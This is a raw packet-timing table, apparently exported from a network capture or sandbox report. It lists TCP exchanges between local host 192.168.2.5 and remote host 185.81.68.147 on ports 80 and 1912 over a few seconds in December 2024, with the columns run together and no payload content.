                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.853498936 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.855911970 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.856281042 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.856337070 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.858587027 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.858701944 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.858777046 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.861247063 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.861294031 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.861351013 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.863856077 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.863981009 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.864034891 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.866579056 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.866611004 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.866672039 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.869118929 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.869225979 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.869477034 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.871963024 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.871995926 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.872101068 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.874423981 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.874479055 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.874686956 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.877219915 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.877233028 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.877305984 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.879678011 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.879780054 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.879829884 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.882453918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.882466078 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.882510900 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.884965897 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.885039091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.885318041 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.887604952 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.887764931 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.887805939 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.890253067 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.930589914 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.944232941 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.944247961 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.944314957 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.945101976 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.945269108 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.945333004 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.947001934 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.947014093 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.947062016 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.948951006 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.948990107 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.949069023 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.950771093 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.950889111 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.951469898 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.952795982 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.952841997 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.952995062 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.955126047 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.955137014 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.955188036 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.956688881 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.956741095 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.956805944 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.958583117 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.958820105 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.958973885 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.960552931 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.960563898 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.960628986 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.962286949 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.962397099 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.962451935 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.964158058 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.964328051 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.964404106 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.965878963 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.965935946 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.965971947 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.999245882 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.051898003 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.085875034 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.115181923 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235150099 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235234022 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235296965 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.355108023 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.355178118 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.476073980 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.696022987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.815880060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.131822109 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.134576082 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.254672050 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.569799900 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.574403048 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.695234060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.695254087 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.695271015 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.695683002 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.695697069 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.696156025 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.880692959 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.880798101 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.880973101 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.882170916 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:24.989871025 CET4973380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.003108025 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.110055923 CET8049733185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.110174894 CET4973380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.110251904 CET4973380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.136102915 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.139811039 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.232044935 CET8049733185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.233230114 CET4973380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.260274887 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.353326082 CET8049733185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.575282097 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.618679047 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:25.739022017 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.054146051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.056348085 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.176218987 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.491871119 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.495368004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.561175108 CET8049733185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.561261892 CET8049733185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.561383009 CET4973380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.562999964 CET4973380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.615761995 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.678910017 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.682749033 CET8049733185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.799176931 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.799257040 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.799380064 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.919478893 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.919548988 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.931113958 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:26.932333946 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.039370060 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.052130938 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.367369890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.411381960 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.682095051 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802151918 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802217007 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802215099 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802249908 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802273989 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802305937 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802335978 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802366018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802383900 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802406073 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802419901 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802450895 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802468061 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.802508116 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922272921 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922454119 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922482967 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922509909 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922538042 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922564983 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922597885 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922827959 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:27.922828913 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.043044090 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.043082952 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.043116093 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.043143988 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.043519020 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.043649912 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.163758039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.164047003 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.164083004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.164305925 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.243083954 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.243175983 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.243236065 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.244347095 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.283961058 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.283994913 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284105062 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284113884 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284143925 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284197092 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284312010 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284367085 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284368038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284400940 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284429073 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.284449100 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.349436045 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.364094019 CET8049739185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.403976917 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404038906 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404062986 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404119015 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404190063 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404192924 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404223919 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404258013 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404257059 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404279947 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404349089 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404351950 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404377937 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404398918 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.404421091 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.469460964 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.469551086 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.469675064 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.523998022 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524065018 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524197102 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524228096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524285078 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524286032 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524318933 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524374008 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524389029 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524419069 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524446964 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524477005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524696112 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.589514971 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.592951059 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644047022 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644196987 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644278049 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644311905 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644344091 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644375086 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644402981 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644403934 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644507885 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644531965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644531965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644536018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644567966 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644587040 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644615889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.645147085 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.712934017 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764303923 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764337063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764439106 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764467955 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764483929 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764483929 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764501095 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764528036 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764539957 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764589071 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764641047 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764671087 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764698982 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764719963 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764795065 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.765949965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884501934 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884532928 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884587049 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884603024 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884614944 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884637117 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884663105 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884663105 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884692907 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884718895 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884740114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884747028 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884774923 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884803057 CET191249709185.81.68.147192.168.2.5
